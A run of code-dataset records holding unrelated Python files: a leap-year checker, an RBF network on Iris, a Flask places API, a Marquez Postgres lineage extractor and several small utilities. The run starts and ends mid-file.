climate_model__short_name='ECMWF-IFS-LR',\n            experiment__short_name='highresSST-present',\n            rip_code='r1i1p1f1'\n        )\n        num_created = 0\n        for data_req in data_reqs:\n            data_req.id = None\n            data_req.rip_code = var_lab\n            data_req.save()\n            num_created += 1\n        logger.debug('{} LR highresSST-present {} data requests created.'.\n                     format(num_created, var_lab))\n\n\nif __name__ == \"__main__\":\n    cmd_args = parse_args()\n\n    # determine the log level\n    if cmd_args.log_level:\n        try:\n            log_level = getattr(logging, cmd_args.log_level.upper())\n        except AttributeError:\n            logger.setLevel(logging.WARNING)\n            logger.error('log-level must be one of: debug, info, warn or error')\n            sys.exit(1)\n    else:\n        log_level = DEFAULT_LOG_LEVEL\n\n    # configure the logger\n    logging.config.dictConfig({\n        'version': 1,\n        'disable_existing_loggers': False,\n        'formatters': {\n            'standard': {\n                'format': DEFAULT_LOG_FORMAT,\n            },\n        },\n        'handlers': {\n            'default': {\n                'level': log_level,\n                'class': 'logging.StreamHandler',\n                'formatter': 'standard'\n            },\n        },\n        'loggers': {\n            '': {\n                'handlers': ['default'],\n                'level': log_level,\n                'propagate': True\n            }\n        }\n    })\n\n    # run the code\n    main(cmd_args)\n","sub_path":"scripts/update_dreqs/update_dreqs_0103.py","file_name":"update_dreqs_0103.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311159179","text":"#Gregorian calendar, the years 2000 and 2400 are leap years,\n#while 1800, 1900, 2100, 2200, 2300 and 2500 are NOT leap years.\n\n\ndef leap_year():\n    year = int(input(\"Enter year to check if it is a leap year or enter 0 to quit: \"))\n    while year != 0:\n        # leap if divisible by 4, except century years, which must be divisible by 400\n        if (year % 4) == 0 and ((year % 100) != 0 or (year % 400) == 0):\n            print(\"{0} is a leap year\".format(year))\n        else:\n            print(\"{0} is not a leap year\".format(year))\n        # re-prompt on every pass so the loop can always terminate\n        year = int(input(\"Enter year to check if it is a leap year or enter 0 to quit: \"))\n\nif __name__ == \"__main__\":\n\n    leap_year()","sub_path":"leap_year.py","file_name":"leap_year.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"490823221","text":"import itertools\nfrom typing import List\n\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.utils import shuffle\n\nfrom backpropagation_perceptron import BackpropagationPerceptron as Perceptron\nfrom nn_utils import 
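# The Gregorian rule used in leap_year() above, reduced to a single predicate,
# with the years from the file's header comment as a self-check (a sketch):
def is_leap(year):
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)

assert all(is_leap(y) for y in (2000, 2400))
assert not any(is_leap(y) for y in (1800, 1900, 2100, 2200, 2300, 2500))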
one_hot_decode, load_folded_and_zero_normalized_iris, format_multineuron_network_output\n\n\ndef phi(first_vector: np.ndarray,\n second_vector: np.ndarray,\n sigma: float\n ) -> float:\n dividend = - np.linalg.norm(first_vector - second_vector) ** 2\n divisor = 2 * (sigma ** 2)\n\n expoent = dividend / divisor\n phi_result = np.exp(expoent)\n return phi_result\n\n\ndef compute_rbf_hidden_layer_output(centroids: np.ndarray,\n input_vector: np.ndarray,\n sigma: float\n ) -> np.ndarray:\n hlo = [phi(first_vector=current_centroid, second_vector=input_vector, sigma=sigma)\n for current_centroid\n in centroids]\n hlo = np.asarray(hlo)\n return hlo\n\n\ndef train_rbf_output_layer(neurons: List[Perceptron],\n hidden_layer_output: np.ndarray,\n expected_output: np.ndarray\n ):\n for neuron_index, neuron in enumerate(neurons):\n neuron.predict_and_learn_as_output_layer(input_vector=hidden_layer_output,\n expected_output=expected_output[neuron_index])\n\n\ndef compute_rbf_output_layer_output(neurons: List[Perceptron],\n hidden_layer_output: np.ndarray\n ) -> np.ndarray:\n output = np.ndarray(len(neurons))\n for neuron_index, neuron in enumerate(neurons):\n output[neuron_index] = neuron.get_output_signal(input_vector=hidden_layer_output)\n\n return output\n\n\ndef main():\n for train_instances, train_labels, test_instances, test_labels in load_folded_and_zero_normalized_iris():\n classes_count = 3\n\n # We could use KMeans to find K centroids... Or we could use the usually-unfeasible strategy of using\n # each instance as a centroid :3 we'll do that, since the dataset is small enough\n centroids = train_instances\n centroid_count = train_instances.shape[0]\n\n # To compute the sigma we use 2 in the following func because we need to combine each centroid to each other,\n # hence all combinations, 2 by 2\n all_combinations_of_centroids = list(itertools.combinations(centroids, 2))\n all_distances = (np.linalg.norm(v1 - v2) for v1, v2 in all_combinations_of_centroids)\n sigma = max(all_distances) / np.sqrt(\n 2 * centroid_count) # Number of classes is multiplied by 2 because the algorithm says so\n\n if sigma == 0:\n raise Exception(\"wtf\")\n\n # The network itself is basically the output neuron + the centroids\n output_neurons = [Perceptron(n_inputs=len(centroids)),\n Perceptron(n_inputs=len(centroids)),\n Perceptron(n_inputs=len(centroids))]\n\n # Training the network\n train_labels = OneHotEncoder(sparse=False).fit_transform(X=train_labels)\n maximum_eras = 200\n for era in range(maximum_eras):\n train_instances, train_labels = shuffle(train_instances, train_labels)\n for instance, label in zip(train_instances, train_labels):\n hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n input_vector=instance,\n sigma=sigma)\n train_rbf_output_layer(neurons=output_neurons,\n hidden_layer_output=hidden_layer_output,\n expected_output=label)\n\n # Testing\n predicted_labels = []\n for instance, label in zip(test_instances, test_labels):\n hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n input_vector=instance,\n sigma=sigma)\n\n rbf_output = compute_rbf_output_layer_output(neurons=output_neurons,\n hidden_layer_output=hidden_layer_output)\n rbf_output = format_multineuron_network_output(rbf_output)\n\n predicted_labels.append(rbf_output)\n\n predicted_labels = np.asarray(predicted_labels)\n\n # Decoding labels\n test_labels = one_hot_decode(test_labels)\n predicted_labels = one_hot_decode(predicted_labels)\n\n print(f\"RBF Accuracy: 
{accuracy_score(y_true=test_labels, y_pred=predicted_labels)}\"\n f\"\\nMLP confusion matrix\"\n f\"\\n{confusion_matrix(y_true=test_labels, y_pred=predicted_labels)}\"\n f\"\\n\")\n\n # # Algorithm parameters\n # maximum_eras = 200\n # shuffle_every_n_eras = 5\n #\n # # Loading the dataset\n # all_instances, all_labels = load_iris(return_X_y=True)\n #\n # # Because reasons\n # all_instances = all_instances.astype(float)\n # all_labels = all_labels.reshape(-1, 1).astype(float)\n #\n # # Normalizing the dataset\n # all_instances = MinMaxScaler().fit_transform(all_instances)\n #\n # # K-Folding\n # set_splitter = StratifiedKFold(n_splits=10, shuffle=True)\n # for train_indexes, test_indexes in set_splitter.split(X=all_instances, y=all_labels):\n # # Separating the instances and labels\n # train_instances = np.asarray([all_instances[i] for i in train_indexes])\n # train_labels = [all_labels[i] for i in train_indexes]\n #\n # test_instances = np.asarray([all_instances[i] for i in test_indexes])\n # test_labels = [all_labels[i] for i in test_indexes]\n #\n # # Since our network will have a single neuron, we must encode the classes\n # train_labels = OneHotEncoder(sparse=False).fit_transform(X=train_labels)\n # test_labels = OneHotEncoder(sparse=False).fit_transform(X=test_labels)\n #\n # # Finding the centroids\n # centroid_count = 150\n # # centroids = KMeans(n_clusters=centroid_count).fit(test_instances).cluster_centers_\n # # centroids = np.asarray(centroids)\n # centroids = train_instances\n #\n # # Computing the sigma\n # # We use 2 in the following func because we need to combine each centroi to each other, hence all combinations,\n # # 2 by 2\n # all_combinations_of_centroids = list(itertools.combinations(centroids, 2))\n # all_distances = (np.linalg.norm(v1 - v2) for v1, v2 in all_combinations_of_centroids)\n #\n # # Number of classes is multiplied by 2 because the algorithm says so\n # sigma = max(all_distances) / np.sqrt(2 * centroid_count)\n # if sigma == 0:\n # print(\"wtf\")\n #\n # # The network itself is basically the output neuron + the centroids\n # output_neurons = [Perceptron(n_inputs=len(centroids)),\n # Perceptron(n_inputs=len(centroids)),\n # Perceptron(n_inputs=len(centroids))]\n #\n # # Training the network\n # for era in range(maximum_eras):\n # if era % shuffle_every_n_eras:\n # train_instances, train_labels = shuffle(train_instances, train_labels)\n #\n # for instance, label in zip(train_instances, train_labels):\n # hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n # input_vector=instance,\n # sigma=sigma)\n #\n # train_rbf_output_layer(neurons=output_neurons,\n # hidden_layer_output=hidden_layer_output,\n # expected_output=label)\n #\n # # Testing\n # predicted_labels = []\n # for instance in test_instances:\n # hidden_layer_output = compute_rbf_hidden_layer_output(centroids=centroids,\n # input_vector=instance,\n # sigma=sigma)\n #\n # rbf_output = compute_rbf_output_layer_output(neurons=output_neurons,\n # hidden_layer_output=hidden_layer_output)\n # rbf_output = format_multineuron_network_output(rbf_output)\n # predicted_labels.append(rbf_output)\n #\n # predicted_labels = np.asarray(predicted_labels)\n #\n # # Decoding labels\n # test_labels = one_hot_decode(test_labels)\n # predicted_labels = one_hot_decode(predicted_labels)\n #\n # print(f\"RBF Accuracy: {accuracy_score(y_true=test_labels, y_pred=predicted_labels)}\")\n # print(\"MLP confusion matrix\")\n # print(confusion_matrix(y_true=test_labels, y_pred=predicted_labels))\n # 
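# A worked example of the sigma heuristic above (sigma = d_max / sqrt(2 * M),
# with M centroids) and of the Gaussian basis phi, on three toy centroids:
import numpy as np
centroids = np.array([[0.0, 0.0], [1.0, 0.0], [0.0, 1.0]])
d_max = max(np.linalg.norm(a - b) for a in centroids for b in centroids)  # sqrt(2)
sigma = d_max / np.sqrt(2 * len(centroids))                               # ~0.577
phi_01 = np.exp(-np.linalg.norm(centroids[0] - centroids[1]) ** 2 / (2 * sigma ** 2))
# phi_01 == exp(-1.5) ~ 0.223, so neighbouring centroids still activate each other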
print()\n\n\nif __name__ == '__main__':\n main()\n print(\"\\nDone!\")\n","sub_path":"nn/radial_basis_function.py","file_name":"radial_basis_function.py","file_ext":"py","file_size_in_byte":9335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"591629595","text":"import setuptools\n\nVERSION = '0.3rc0'\n\nsetuptools.setup(\n name='fabulus',\n version=VERSION,\n author='Stefan B, Alexander R',\n author_email='Steve2608@users.noreply.github.com',\n url='https://github.com/AlexRaschl/FABULUS-A-machine-learning-enterprise',\n download_url='https://github.com/AlexRaschl/FABULUS-A-machine-learning-enterprise/archive/'\n f'v_{VERSION}.tar.gz',\n description='Utility packages for Machine Learning and Data Visualisation',\n packages=[\n 'fabulus',\n 'fabulus/_internal',\n 'fabulus/io',\n 'fabulus/net',\n 'fabulus/postprocessing',\n 'fabulus/unsup',\n 'fabulus/vis',\n ],\n classifiers=[\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'\n ],\n install_requires=[\n 'matplotlib',\n 'numpy',\n 'sklearn',\n 'seaborn',\n 'tensorflow'\n ]\n)\n","sub_path":"pypi_install_script/fabulus-0.3rc0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34794981","text":"#!/usr/bin/python3\n\"\"\"\nNew view for State objects that handles all default\nRestFul API actions\n\"\"\"\nfrom flask import Flask, jsonify, Blueprint, abort, request\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom models.place import Place\nfrom models.user import User\n\n\n@app_views.route('/cities//places',\n methods=['GET'], strict_slashes=False)\ndef all_places(city_id=None):\n \"\"\" Retrieves the list of all places of a City objects \"\"\"\n cities_id = storage.get(City, city_id)\n if cities_id is None:\n abort(404)\n list_dic_places = []\n for place in cities_id.places:\n list_dic_places.append(place.to_dict())\n\n return jsonify(list_dic_places)\n\n\n@app_views.route('/places/', methods=['GET'], strict_slashes=False)\ndef places_id(place_id=None):\n \"\"\" Retrieves a Place object \"\"\"\n places_id = storage.get(Place, place_id)\n if places_id is None:\n abort(404)\n\n return jsonify(places_id.to_dict())\n\n\n@app_views.route('/places/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_place(place_id=None):\n \"\"\" Delete a Place object \"\"\"\n places_id = storage.get(Place, place_id)\n if places_id is None:\n abort(404)\n\n storage.delete(places_id)\n storage.save()\n\n return jsonify({}), 200\n\n\n@app_views.route('/cities//places',\n methods=['POST'], strict_slashes=False)\ndef create_place(city_id):\n \"\"\" Create a Place object \"\"\"\n cities_id = storage.get(City, city_id)\n if cities_id is None:\n abort(404)\n if not request.get_json():\n return jsonify({\"error\": \"Not a JSON\"}), 400\n if 'user_id' not in request.get_json():\n return jsonify({\"error\": \"Missing user_id\"}), 400\n\n req_place = request.get_json()\n if storage.get(User, req_place['user_id']) is None:\n abort(404)\n if 'name' not in req_place:\n return jsonify({\"error\": \"Missing name\"}), 400\n\n req_place['city_id'] = city_id\n req_place['user_id'] = req_place['user_id']\n new_place = Place(**req_place) # kwargs\n\n storage.new(new_place)\n storage.save()\n\n return jsonify(new_place.to_dict()), 201\n\n\n@app_views.route('/places/', methods=['PUT'], 
strict_slashes=False)\ndef update_place_id(place_id=None):\n \"\"\" Update a City object \"\"\"\n places_id = storage.get(Place, place_id)\n req_place = request.get_json()\n if places_id is None:\n abort(404)\n if not req_place:\n return jsonify({\"error\": \"Not a JSON\"}), 400\n\n for key, values in req_place.items():\n if key not in ['id', 'user_id', 'city_id', 'created_at', 'update_at']:\n setattr(places_id, key, values)\n\n storage.save()\n\n return jsonify(places_id.to_dict()), 200\n","sub_path":"api/v1/views/places.py","file_name":"places.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"430009665","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/brainfreeze/extension.py\n# Compiled at: 2008-11-10 02:21:45\n\"\"\"OneToOne MapperExtension\"\"\"\nfrom sqlalchemy import util\nfrom sqlalchemy.orm import MapperExtension, class_mapper, EXT_CONTINUE\nfrom sqlalchemy.exceptions import ArgumentError\nfrom properties import one_to_one\n__all__ = [\n 'OneToOneMapperExtension']\n\nclass OneToOneMapperExtension(MapperExtension):\n \"\"\"MapperExtension to proxy properties on one-to-one relations.\n\n This extension proxies access to all properties of the specified\n one-to-one relations without an intermediate layer. \n \n The intended use case is to allow a type composed of multiple tables to\n be easily mapped and queried as if it were one table.\n\n \"\"\"\n\n def __init__(self, *related_classes, **kwargs):\n if len(util.to_list(related_classes)) != len(util.to_set(related_classes)):\n raise ArgumentError('Name collision, classes may only be specified once: %r' % related_classes)\n self.related_classes = util.to_list(related_classes)\n self.property_prefix = kwargs.get('property_prefix', '_')\n\n def instrument_class(self, mapper, class_):\n for value_class in self.related_classes:\n value_mapper = class_mapper(value_class, compile=False)\n key = self.property_prefix + value_mapper.local_table.key\n if key in mapper._init_properties:\n raise ArgumentError(\"OneToOne relation '%s' conflicts with existing property\" % key)\n mapper._init_properties[key] = one_to_one(value_class)\n\n return EXT_CONTINUE","sub_path":"pycfiles/BrainFreeze-0.1rc2-py2.5/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"115339639","text":"'''\nThis module contains utility functions for interacting with Notepad++.\n'''\n\nimport Npp\n\ndef eol_string():\n '''\n Returns the EOL string that the corresponds to the current EOL mode.\n '''\n eol_mode = Npp.editor.getEOLMode()\n eol_mode_character_map = {\n int(Npp.ENDOFLINE.CRLF) : '\\r\\n',\n int(Npp.ENDOFLINE.CR) : '\\r',\n int(Npp.ENDOFLINE.LF) : '\\n'}\n return eol_mode_character_map[eol_mode]\n","sub_path":"npp_utils.py","file_name":"npp_utils.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"649298433","text":"from __future__ import division\nimport cPickle\nimport dependency_tree\nimport itertools\nimport numpy as np\nfrom collections import Counter, defaultdict\nfrom scipy import stats\nfrom scipy.stats import entropy\n\n\ndef get_stats_rst(rstdeps):\n heights = []\n node_depths = 
Counter()\n root_position = Counter()\n root_first = 0\n root_last = 0\n num_roots = 0\n normalized_arc_lengths = []\n leaf_node_proportions = []\n parent_entropies = []\n\n for rstdep in rstdeps:\n edges = rstdep.edges\n\n deps = defaultdict(list)\n for edge in edges:\n parent = edge.tgt_idx\n child = edge.src_idx\n if parent is None:\n parent = -1\n deps[parent].append(child)\n\n parents = deps.keys() # includes root -1\n num_nodes = len(list(itertools.chain.from_iterable(deps.values())))\n\n # how long are the edges?\n normalized_arc_lengths.extend(get_arc_length(edges))\n\n # how many nodes are leaves?\n num_parents = len(parents) - 1 # don't count root\n leaf_node_proportions.append(get_leaf_proportion(edges, num_parents))\n\n # how many children per parent?\n parent_entropies.append(entropy_for_parents(parents))\n\n heights.append(len(deps.keys()))\n # build node depth for this doc\n doc_node_depths = {}\n for parent_num, parent in enumerate(deps.keys()):\n doc_node_depths[parent_num] = len(deps[parent])\n\n for key, value in doc_node_depths.items():\n node_depths[key] += value\n\n roots = np.array(deps[-1])\n\n for root in roots:\n num_roots += 1\n if root == 0:\n root_first += 1\n elif root == num_nodes-1:\n root_last += 1\n # create 3 bins, for beginning, middle, end of doc\n bins = np.array_split(np.arange(num_nodes), 3)\n for ix, bin in enumerate(bins):\n if root in bin:\n root_position[ix] += 1\n\n print(\"Stats for normalized arc length: \", np.mean(np.array(normalized_arc_lengths)),\n np.std(np.array(normalized_arc_lengths)), np.min(np.array(normalized_arc_lengths)),\n np.max(np.array(normalized_arc_lengths)))\n print(\"Stats for leaf node proportions: \", np.mean(np.array(leaf_node_proportions)),\n np.std(np.array(leaf_node_proportions)), np.min(np.array(leaf_node_proportions)),\n np.max(np.array(leaf_node_proportions)))\n print(\"Stats for parent entropy: \", np.mean(np.array(parent_entropies)),\n np.std(np.array(parent_entropies)), np.min(np.array(parent_entropies)),\n np.max(np.array(parent_entropies)))\n print(\"Processed \", len(rstdeps), \" trees.\")\n print(\"\\nStats for heights: \")\n print(np.mean(heights), np.std(heights), np.min(heights), np.max(heights), Counter(heights).keys(),\n Counter(heights).values() / np.sum(Counter(heights).values()))\n print(\"\\nStats for node depths: \")\n print(node_depths.keys(), node_depths.values() / np.sum(node_depths.values()))\n print(\"\\nRoot to position in sentence: \")\n print(\"First: \", root_first/num_roots, \", Last: \", root_last/num_roots, \"Bins: \", root_position.keys(),\n root_position.values() / np.sum(root_position.values()))\n\n\ndef get_stats(docs):\n heights = []\n node_depths = Counter()\n sentiments = []\n sent_scores = []\n other_sent_scores = []\n root_sentiments = []\n root_sent_scores = []\n root_position = Counter()\n root_first = 0\n root_last = 0\n correct_docs = 0\n num_roots = 0\n normalized_arc_lengths = []\n leaf_node_proportions = []\n parent_entropies = []\n\n for doc in docs:\n if doc.gold_label == doc.predicted_label:\n # how long are the edges?\n edges = doc.tree.edges\n normalized_arc_lengths.extend(get_arc_length(edges))\n\n # how many nodes are leaves?\n num_parents = len(doc.tree.deps.keys()) - 1 # don't count the root\n leaf_node_proportions.append(get_leaf_proportion(edges, num_parents))\n\n # how many children per parent?\n parent_entropies.append(get_parent_entropy(doc, edges))\n\n correct_docs += 1\n heights.append(doc.tree.height)\n for key, value in doc.tree.node_depths.items():\n 
node_depths[key] += value\n sentiments.extend(doc.sentiments)\n sent_scores.extend(doc.sentiment_scores)\n roots = np.array(doc.tree.deps[0])-1 # need to subtract to account for 0 root in the tree\n\n for root in roots:\n num_roots += 1\n if root == 0:\n root_first += 1\n elif root == len(doc.sentiments)-1:\n root_last += 1\n # create 3 bins, for beginning, middle, end of doc\n bins = np.array_split(np.arange(len(doc.sentiments)), 3)\n for ix, bin in enumerate(bins):\n if root in bin:\n root_position[ix] += 1\n root_sentiments.append(doc.sentiments[root])\n root_sent_scores.append(doc.sentiment_scores[root])\n mask_roots = np.ones(len(doc.sentiment_scores), bool)\n mask_roots[roots] = False\n other_sent_scores.extend(np.array(doc.sentiment_scores)[mask_roots])\n\n print(\"Stats for normalized arc length: \", np.mean(np.array(normalized_arc_lengths)),\n np.std(np.array(normalized_arc_lengths)), np.min(np.array(normalized_arc_lengths)),\n np.max(np.array(normalized_arc_lengths)))\n print(\"Stats for leaf node proportions: \", np.mean(np.array(leaf_node_proportions)),\n np.std(np.array(leaf_node_proportions)), np.min(np.array(leaf_node_proportions)),\n np.max(np.array(leaf_node_proportions)))\n print(\"Stats for parent entropy: \", np.mean(np.array(parent_entropies)),\n np.std(np.array(parent_entropies)), np.min(np.array(parent_entropies)),\n np.max(np.array(parent_entropies)))\n print(\"Processed \", correct_docs, \" out of \", len(docs), \" documents that were labelled correctly.\")\n print(\"\\nStats for heights: \")\n print(np.mean(heights), np.std(heights), np.min(heights), np.max(heights), Counter(heights).keys(),\n Counter(heights).values() / np.sum(Counter(heights).values()))\n print(\"\\nStats for node depths: \")\n print(node_depths.keys(), node_depths.values() / np.sum(node_depths.values()))\n print(\"\\nStats for sentiments: \")\n print(np.mean(sentiments), np.std(sentiments), Counter(sentiments).keys(),\n Counter(sentiments).values() / np.sum(Counter(sentiments).values()))\n print(\"\\nStats for root sentiments: \")\n print(np.mean(root_sentiments), np.std(root_sentiments), Counter(root_sentiments).keys(),\n Counter(root_sentiments).values() / np.sum(Counter(root_sentiments).values()))\n print(\"\\nStats for sentiment scores: \")\n print(np.mean(np.abs(sent_scores)), np.std(np.abs(sent_scores)))\n print(\"\\nStats for root sentiment scores: \")\n print(np.mean(np.abs(root_sent_scores)), np.std(np.abs(root_sent_scores)))\n print(\"\\nRoot to position in sentence: \")\n print(\"First: \", root_first/num_roots, \", Last: \", root_last/num_roots, \"Bins: \", root_position.keys(),\n root_position.values() / np.sum(root_position.values()))\n t_stat, p_value_two_sided = stats.ttest_ind(np.abs(root_sent_scores), np.abs(other_sent_scores), equal_var=False)\n print(\"T-statistic: \", t_stat, \", p_value for rejecting null hypothesis that mean(other sents) >= mean(root sents)\",\n p_value_two_sided/2)\n\n\ndef get_parent_entropy(doc, edges):\n parents_list = []\n for i in range(1, len(edges) + 1):\n parent = next(key for key, value in doc.tree.deps.items() if i in value)\n parents_list.append(parent)\n return entropy_for_parents(parents_list)\n\n\ndef get_leaf_proportion(edges, num_parents):\n num_leaf_nodes = len(edges) - num_parents\n return num_leaf_nodes / len(edges)\n\n\ndef get_arc_length(edges):\n lengths = np.zeros([len(edges)])\n for i, edge in enumerate(edges):\n tgt_idx = edge.tgt_idx if edge.tgt_idx is not None else (edge.src_idx+1) # account for missing root in rst deps\n 
lengths[i] = np.abs(edge.src_idx - tgt_idx)\n lengths /= len(edges)\n return lengths\n\n\ndef entropy_for_parents(labels, base=None):\n value, counts = np.unique(labels, return_counts=True)\n return entropy(counts, base=base)\n\n\nif __name__ == '__main__':\n import sys\n from os import path\n\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n from data_structure import ProcessedDoc\n\n pickle_file = sys.argv[1]\n docs = cPickle.load(open(pickle_file))\n get_stats(docs)","sub_path":"postprocess/processed_doc_stats.py","file_name":"processed_doc_stats.py","file_ext":"py","file_size_in_byte":8785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"306672141","text":"\"\"\"---------------------------------------------------------------------------\nMODULE\n FANotifyUtils - generic methods required for the library\n\nDESCRIPTION\n This module contains the genric methods used by the FANotification library.\n\n---------------------------------------------------------------------------\"\"\"\n\nimport acm\n\ndef string_padding(data, limit=12):\n \"\"\"Performs string padding. It limits the length of logger source in notification logs.\"\"\"\n if len(data) < limit:\n data = data.ljust(limit)\n else:\n data = data[:limit]\n return data \n\ndef get_acm_user(user):\n \"\"\"Get ACM users\"\"\"\n acm_users = []\n invalid_users = []\n user_lst = string_as_list(user)\n if user_lst:\n for usr in user_lst:\n if acm.FUser[usr]:\n acm_users.append(acm.FUser[usr].Name())\n else:\n invalid_users.append(usr)\n return acm_users, invalid_users\n\ndef string_as_list(strng):\n \"\"\"Returns a list from string separated by comma\"\"\"\n lst = []\n if isinstance(strng, str):\n try:\n lst = eval(strng)\n except Exception:\n strng_split = strng.split(',')\n for data in strng_split:\n lst.append(data.strip().strip(\"'\").strip('\"'))\n elif isinstance(strng, type([])):\n for i in strng:\n if isinstance(i, str):\n lst.append(i.strip())\n else:\n lst.append(i)\n return lst\n","sub_path":"Extensions/FANotification/FPythonCode/FANotifyUtils.py","file_name":"FANotifyUtils.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"336170340","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom contextlib import closing\nfrom typing import Optional\nfrom urllib.parse import urlparse\n\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.postgres_operator import PostgresOperator\n\nfrom marquez.models import (\n DbTableName,\n DbTableSchema,\n DbColumn\n)\nfrom marquez_airflow.utils import get_normalized_postgres_connection_uri, get_connection\nfrom marquez.sql import SqlMeta, SqlParser\nfrom marquez_airflow.extractors.base import (\n BaseExtractor,\n StepMetadata\n)\nfrom marquez.dataset import Source, Dataset\n\n_TABLE_SCHEMA = 0\n_TABLE_NAME = 1\n_COLUMN_NAME = 2\n_ORDINAL_POSITION = 3\n# Use 'udt_name' which is the underlying type 
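# What entropy_for_parents() above computes: the Shannon entropy (in nats) of
# how children are distributed over parents. A tiny example:
import numpy as np
from scipy.stats import entropy
parents = [0, 0, 0, 1]              # three children under node 0, one under node 1
_, counts = np.unique(parents, return_counts=True)
print(entropy(counts))              # ~0.562; 0.0 would mean all children share one parent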
of column\n# (ex: int4, timestamp, varchar, etc)\n_UDT_NAME = 4\n\n\nclass PostgresExtractor(BaseExtractor):\n operator_class = PostgresOperator\n default_schema = 'public'\n\n def __init__(self, operator):\n super().__init__(operator)\n self.conn = None\n\n def extract(self) -> StepMetadata:\n # (1) Parse sql statement to obtain input / output tables.\n sql_meta: SqlMeta = SqlParser.parse(self.operator.sql, self.default_schema)\n\n # (2) Get database connection\n self.conn = get_connection(self._conn_id())\n\n # (3) Default all inputs / outputs to current connection.\n # NOTE: We'll want to look into adding support for the `database`\n # property that is used to override the one defined in the connection.\n source = Source(\n scheme=self._get_scheme(),\n authority=self._get_authority(),\n connection_url=self._get_connection_uri()\n )\n\n database = self.operator.database\n if not database:\n database = self._get_database()\n\n # (4) Map input / output tables to dataset objects with source set\n # as the current connection. We need to also fetch the schema for the\n # input tables to format the dataset name as:\n # {schema_name}.{table_name}\n inputs = [\n Dataset.from_table(\n source=source,\n table_name=in_table_schema.table_name.name,\n schema_name=in_table_schema.schema_name,\n database_name=database\n ) for in_table_schema in self._get_table_schemas(\n sql_meta.in_tables\n )\n ]\n outputs = [\n Dataset.from_table_schema(\n source=source,\n table_schema=out_table_schema,\n database_name=database\n ) for out_table_schema in self._get_table_schemas(\n sql_meta.out_tables\n )\n ]\n\n return StepMetadata(\n name=f\"{self.operator.dag_id}.{self.operator.task_id}\",\n inputs=inputs,\n outputs=outputs,\n context={\n 'sql': self.operator.sql\n }\n )\n\n def _get_connection_uri(self):\n return get_normalized_postgres_connection_uri(self.conn)\n\n def _get_scheme(self):\n return 'postgres'\n\n def _get_database(self) -> str:\n if self.conn.schema:\n return self.conn.schema\n else:\n parsed = urlparse(self.conn.get_uri())\n return f'{parsed.path}'\n\n def _get_authority(self) -> str:\n if self.conn.host and self.conn.port:\n return f'{self.conn.host}:{self.conn.port}'\n else:\n parsed = urlparse(self.conn.get_uri())\n return f'{parsed.hostname}:{parsed.port}'\n\n def _conn_id(self):\n return self.operator.postgres_conn_id\n\n def _information_schema_query(self, table_names: str) -> str:\n return f\"\"\"\n SELECT table_schema,\n table_name,\n column_name,\n ordinal_position,\n udt_name\n FROM information_schema.columns\n WHERE table_name IN ({table_names});\n \"\"\"\n\n def _get_hook(self):\n return PostgresHook(\n postgres_conn_id=self.operator.postgres_conn_id,\n schema=self.operator.database\n )\n\n def _get_table_schemas(\n self, table_names: [DbTableName]\n ) -> [DbTableSchema]:\n # Avoid querying postgres by returning an empty array\n # if no table names have been provided.\n if not table_names:\n return []\n\n # Keeps tack of the schema by table.\n schemas_by_table = {}\n\n hook = self._get_hook()\n with closing(hook.get_conn()) as conn:\n with closing(conn.cursor()) as cursor:\n table_names_as_str = \",\".join(map(\n lambda name: f\"'{name.name}'\", table_names\n ))\n cursor.execute(\n self._information_schema_query(table_names_as_str)\n )\n for row in cursor.fetchall():\n table_schema_name: str = row[_TABLE_SCHEMA]\n table_name: DbTableName = DbTableName(row[_TABLE_NAME])\n table_column: DbColumn = DbColumn(\n name=row[_COLUMN_NAME],\n type=row[_UDT_NAME],\n 
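# _information_schema_query() above splices the table names straight into the
# SQL string. With the psycopg2 cursor that PostgresHook returns, the same
# lookup can be parameterized instead (a sketch):
cursor.execute(
    """
    SELECT table_schema, table_name, column_name, ordinal_position, udt_name
    FROM information_schema.columns
    WHERE table_name = ANY(%s);
    """,
    ([t.name for t in table_names],),  # psycopg2 adapts the Python list to a SQL array
)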
